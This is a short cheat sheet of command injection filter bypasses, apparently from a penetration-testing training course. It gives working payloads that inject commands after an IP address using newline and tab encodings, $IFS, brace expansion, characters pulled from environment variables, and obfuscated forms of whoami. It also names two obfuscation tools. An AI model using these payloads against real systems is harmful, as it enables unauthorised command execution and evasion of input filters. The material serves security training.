Skip to content

Command Injection

Bypassing Space Filters

Using Tabs (%09)

127.0.0.1%0a%09

Using $IFS

Linux Environment Variable ($IFS) default value is a space and a tab.

127.0.0.1%0a${IFS}

Using Brace Expansion

127.0.0.1%0a{ls,-la}

Bypassing Other Blacklisted Characters

Linux

Character Bypass
/ ${PATH:0:1}
; ${LS_COLORS:10:1}

Windows

CMD

C:\htb> echo %HOMEPATH:~6,-11%

\

PowerShell

PS C:\htb> $env:HOMEPATH[0]

\


PS C:\htb> $env:PROGRAMFILES[10]
PS C:\htb>

Character Shifting

$ echo $(tr '!-}' '"-~'<<<[)
\

Bypassing Blacklisted Commands

w'h'o'am'i
w"h"o"am"i
who$@ami
w\ho\am\i
$(tr "[A-Z]" "[a-z]"<<<"WhOaMi")
$(a="WhOaMi";printf %s "${a,,}")
$(rev<<<'imaohw')
bash<<<$(base64 -d<<<d2hvYW1pCg==)  # using <<< to avoid using a pipe |

Evasion Tools

Linux

Bashfuscator

Windows

DOSfuscation